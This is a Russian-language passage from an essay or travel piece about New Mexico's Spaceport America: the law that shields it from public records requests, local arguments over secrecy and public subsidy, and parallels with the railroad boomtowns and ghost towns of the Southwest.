Успехи аэрокосмоса за пределами Нью-Мексико сразу вызывают ажиотаж среди тех, кто поддержал строительство космопорта; например, некоторое время спустя после моей командировки Илон Маск успешно запустил личный автомобиль Tesla при помощи РН Falcon Heavy, что добавило жизнерадостности всей частной космонавтике в целом. (Увы, хотя SpaceX и собиралась арендовать здесь старт на регулярной основе, вскоре её интересы переместились в сторону собственного комплекса в Браунсвилле, Техас)
Те пассажиры, которые в состоянии позволить себе потратить 250000$ на билет, могут совершить небольшое путешествие в зону нулевой гравитации и благополучно вернуться на Землю.Но когда демонстрировать по факту особо нечего, многие космические компании вдруг начинают считать, что почти все результаты своей работы нужно беречь не хуже, чем коммерческую тайну — и порой доходит до того, что гласность в отношении финансирования и владения признаётся серьёзной помехой для развития проектов. Вот и сейчас, законодательное собрание Нью-Мексико подавляющим большинством голосов приняло законопроект, в котором космопорт получает исключительное право не отвечать на гражданские запросы. Исполнительный директор «Америки» Дэн Хикс в качестве аргументации в защиту законопроекта рассказал, что многие потенциальные клиенты выбрали другие пусковые площадки, опасаясь сбора информации о своей деятельности со стороны конкурентов посредством публичных запросов. Таким образом, законодательное собрание удовлетворило требования космопорта, а заодно на том же заседании было решено перечислить ещё 10 миллионов долларов на операционные расходы и постройку ещё одного ангара.
Демонстрационный стенд для туристов как попытка поместить планы по развитию комплекса в контекст геологических эпох. Фото: Ingrid Burrington
Перед принятием в законопроект были внесены небольшие изменения, которые успокоили тех, кто выступает за прозрачность деятельности властей, но всё равно, за администрацией «Америки» закреплена возможность решать, на какие запросы она ответит. Кроме того, совершенно неясно, что делать, если арендаторы захотят скрыть разлив токсичных химикатов или устроят какую-то другую экологическую аварию (поправку по этому вопросу, которую внёс один из членов заксобрания Джефф Стейнборн, отклонили). На космодроме же признают обоснованность такого беспокойства, но настаивают на том, что по принятому закону в таких случаях можно будет эффективно принять меры.
Для тех городков штата, которые рассматривают космопорт как локомотив экономики, запрет спрашивать преподносится как цена за ведение бизнеса. «Я думаю, Нью-Мексико от этого только выиграет», — сказал Грин, мэр Трут-ор-Консекуэнсес, когда зашёл разговор о скользкой дорожке «исключительности» для проектов с госфинансированием — «Не понимаю, с какой стати общественность должна знать, чем тут занимаются SpaceX, Boeing, Virgin, какие технологии обкатывают. Это их дело. Хотите узнать чем они занимаются? Покупайте их товары».
А вот редактор веб-издания NMPolitics.net Хит Хуссамин, напротив, считает, что успеха нельзя достигнуть, действуя тайком. «Я очень надеюсь, что „Америка“ заработает», — говорит он — «Я живу здесь всю свою жизнь, а моей дочери уже шесть. Увы, основной экспортный ресурс Нью-Мексико — это молодёжь, потому что мы можем дать им образование, но не можем дать возможностей для самореализации». Он призывается задуматься о последствиях наличия космодрома в дальней перспективе. Например, налоги, которые заплатят Сиерра и Донья-Ана, можно было бы пустить на внедрение в школах программы STEM. Хуссамин верит, что космопорт оживит экономику, но он также и верит, что «это и обязанность, и право любого человека — знать, что в итоге он получит за свои деньги».
Возможно, именно из-за упора на секретность в маркетинговых материалах «Америки», равно как и в информации для туристов, нет ничего кроме планов Virgin Galactic по поводу космического туризма. Те пассажиры, которые в состоянии позволить себе потратить 250000$ на билет, могут совершить небольшое путешествие в зону нулевой гравитации и благополучно вернуться на Землю. Это довольно далеко от «полётов в космос по демократичным ценам», и тем более не подходит на роль основного и стабильного источника дохода. Судя по отсутствию заметной активности в офисе Virgin, их полёты больше похожи на трюки, нежели на науку; но по непонятной причине большинство членов моей тургруппы принимают все замыслы о «грядущих путешествиях в марсианские колонии» как fait accompli. Поначалу не очень ясно, почему люди в пустыне мечтают о ещё более неуютном для жизни месте.
Но мифология американского «фронтира» здесь накладывается на фактическое порубежье: экстремальные среды, глубокий космос и удалённые уголки пустыни имеют много общего. Это объясняет, например, и запущенный в Юте проект Mars Desert Research Station, эксперимент по созданию обитаемого убежища в псевдомарсианских условиях для отработки технологий будущих экспедиций. Мечты о том, чтобы оказаться в космосе чем-то схожи с мечтой покорить пустыню: есть неизведанное пространство, вероятно, там можно найти богатый источник ресурсов, а таинственные новые земли могут оказаться лучше тех безысходных, что путник оставляет позади. Этот регион видел множество циклов «бум-спад» во времена горно- и нефтегазодобычи, здесь всегда недостаёт перспектив, жизнь в основном определяется искусством торговаться за воду, а изменения климата представляют реальную угрозу (штат более чем наполовину сейчас переживает серьёзную засуху) — наверное, именно поэтому для местных жителей вера в неизбежную колонизацию Марса не слишком отличается от веры в возможность выжить на Юго-Западе.
Усомниться в неизбежности наступления технологического и социального прогресса с появлением ветки железной дороги было равноценно сомнению в Воле ГосподнейВероятно, это и есть та правда об «Америке», которую не принято обсуждать — но от которой и нельзя уйти. Ведь романтика и привлекательность Дикого Запада держались, помимо прочего, на федеральных грантах на землю для частных контор, которые затем и возводили бумтауны в местах, раньше считавшихся безжизненной пустошью. Города росли и увядали в зависимости от того, как менялась карта железных дорог; например, последний резкий поворот в истории Лас-Крусеса наступил, когда город продал преимущественное право на проезд компании Atchison Topeka & Santa Fe Railroad и превратился в крупный транзитный узел.
Этот земной автобус будто случайно оказался в тени инопланетной структуры, из которых состоит город-призрак. Фото: Ingrid Burrington
Говоря словами сторонников «рока», в те времена усомниться в неизбежности наступления технологического и социального прогресса с появлением ветки железной дороги было равноценно сомнению в Воле Господней. В наши дни задаваться вопросом о необходимости развития космонавтики, финансируемой (в основном) из непубличных источников — это как задавать вопрос «зачем вообще нужен технический прогресс?». Космопорт «Америка» в этом смысле не отличается от городков, порождённых железнодорожными и горнодобывающими компаниями, и даже открыто проводит такие параллели в своих рекламных буклетах — в которых, к слову, «прогресс» выступает в роли дымовой завесы от требований открыто публиковать бухгалтерскую отчётность и беспокойства насчёт вложений в подобные проекты средств налогоплательщиков. «Романтика» космоса здесь, увы, призвана отвлечь от того факта, что в общем и целом космодром — это прежде всего ресурс, который получает дотации из госбюджета, но при этом главным образом обслуживает частников, и построен он не для развлечения, а для того, чтобы привлечь дополнительные деньги и новую технологическую отрасль в бедный и изголодавшийся по рабочим местам район. Заявленная цена и PR-риторика, конечно, тут выглядят иначе, чем в городах, которые бьются в тендерных войнах за право построить у себя очередной дата-центр Facebook или корпоративный технологический кампус, но вот озабоченность общества насчёт госфинансирования частных компаний, которые при этом ещё и требуют себе налоговых льгот вместе с режимом секретности (не считая вопросов о том, когда профит от проектов почувствуют те, кто более всего в этом нуждается) — остаётся везде более или менее одинаковой.
Автобус возвращается обратно в Трут-ор-Консекуэнсес, а мы смотрим ещё одно видео, презентующее повышение доступности космоса через рост эффективности частного бизнеса. Нам напоминают, что Нью-Мексико всегда был на пути к процветанию, «от петроглифов до космолётов». Не спорю, космодром уже стал частью истории Юго-Запада, но это пока это очень удручающая история без очевидного счастливого финала. Когда стоишь на пустой взлётно-посадочной полосе или едешь сквозь Нью-Мексико, Аризону, Юту, Неваду или Калифорнию, то перед глазами неотступно маячит длинная вереница городов-призраков из так и не наступившего «завтра», перемежающаяся местечками, которые застыли в вечном «сейчас», и размышлять об этом чрезвычайно тоскливо.
Я наблюдаю за группой скучающих коров на Jornada del Muerto, оставив космопорт «Америка» за спиной, и гадаю, будет ли прогресс всегда выглядеть как «репетиция» перед тем, как мы действительно окажемся в некоем «будущем», или всё-таки мы обречены вечно жить в иллюзии «будущего на пороге», пока окончательно не утратим интерес к бесконечному повтору одной и той же сцены. И не нахожу верного ответа; как знать, может именно в этом году «будущее» наконец придёт в «Америку», посрамив всех нетерпеливых скептиков.
Ведь здесь, в пустыне, всегда кажется, что лучшие времена ждут тебя буквально за углом.